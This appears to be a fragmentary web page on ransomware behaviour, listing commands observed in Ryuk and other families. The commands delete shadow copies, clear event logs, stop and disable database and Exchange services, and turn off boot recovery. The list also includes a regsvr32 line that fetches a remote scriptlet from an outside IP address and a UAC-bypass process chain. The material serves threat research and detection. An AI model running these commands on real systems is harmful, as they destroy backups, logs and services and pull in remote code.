COMMON RANSOMWARE FLOW

COMMANDS USED IN RYUK RANSOMWARE

​

​

​

​

WIPER ACTIVITY (DESTROYING MBR AND THE FILE-SYSTEM)

​

​

​

CRYSIS RANSOMWARE

​

​

Ransomware LATERAL MOVEMENT VIA PSEXEC

​

ENUMERATION

PROPAGATION

LATERAL MOVEMENT VIA VULNERABILITY

CLICK HERE

RANSOMWARE VIA ASSEMBLIES

CLICK HERE

MATRIX RANSOMWARE

CLICK HERE

HDDCRYPTOR MAMBA RANSOMWARE

CLICK HERE

PETYA NOT!PETYA

CLICK HERE

MACRO BASED RANSOMWARE

CLICK HERE

RYUK RANSOMWARE

CLICK HERE

SCARAB RANSOMWARE

CLICK HERE

SOME OF THE COMMANDS USED

regsvr32 C:\WINDOWS\Media\ActiveX.ocx /s

"C:\qrmbg\..\Windows\n\twvs\..\..\system32\snv\wxqrm\kpow\..\..\..\wbem\uvwhg\h\..\..\wmic.exe" shadowcopy delete

"C:\Windows\System32\mshta.exe" "C:\Users\foo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

"C:\jrd\cqsa\..\..\Windows\vlg\f\..\..\system32\nvv\krf\..\..\wbem\cft\bh\qht\..\..\..\wmic.exe" shadowcopy delete

​

​

/c wevtutil cl Application

/c wevtutil cl security

wevtutil  cl security

/c wevtutil cl setup

/c wevtutil cl system

/c vssadmin.exe Delete Shadows \/All \/Quiet

/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE

WMIC  SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE

/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL  ChangeStartMode 'Disabled'

/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL  ChangeStartMode 'Disabled'

sc  config FirebirdServerDefaultInstance start= disabled

/c taskkill \/IM fb_inet_server.exe \/F

/c net stop FirebirdServerDefaultInstance

net  stop FirebirdServerDefaultInstance

C:\Windows\system32\net1  stop FirebirdServerDefaultInstance

/c taskkill \/IM sqlservr.exe \/F

taskkill  \/IM sqlservr.exe \/F

/c sc config MSSQLSERVER start= disabled

/c taskkill \/IM pg_ctl.exe \/F

/c sc config postgresql-9.0 start= disabled

/c sc config MSExchangeAB start= disabled

/c sc config MSExchangeMailSubmission start= disabled

C:\Windows\system32\cmd.exe /c cls

​

​

C:\Windows\system32\cmd.exe /c tAskkill /F /IM mysqld.exe&tAskkill /F /IM httpd.exe&tAskkill /F /IM sqlservr.exe&tAskkill /F /IM sqlwriter.exe&tAskkill /F /IM w3wp.exe

&tAskkill /F /IM sqlagent.exe&tAskkill /F /IM orac

​

regsvr32  /u /s /i:http://94.103.86.99/s/svchosts.bmp scrobj.dll

​

C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet&vssadmin delete shadows /all /quiet

vssadmin  delete shadows /all /quiet

​

C:\Windows\explorer.exe C:\Windows\System32\CompMgmtLauncher.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

        • C:\Windows\System32\CompMgmtLauncher.exe

        • consent.exe 940 358 000000000421F180

        • C:\Windows\system32\mmc.exe C:\Windows\system32\compmgmt.msc /s C:\Windows\System32\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures vssadmin.exe Delete Shadows /All /Quiet

        • C:\Windows\system32\vssvc.exe

        • C:\Windows\explorer.exe C:\Windows\System32\CompMgmtLauncher.exe

​

​

​

​

SOME OTHER (RANSOMWARE) FLOWS AND LATERAL MOVEMENT

USE OF OBFUSCATION

CLICK HERE

Ransomware Executing Commands

Encrypting Files via 3rd party open source libraries

Avoiding the use of vssadmin

CLICK TO GET YOUR GIFT (HIT PLAY BUTTON)

THE END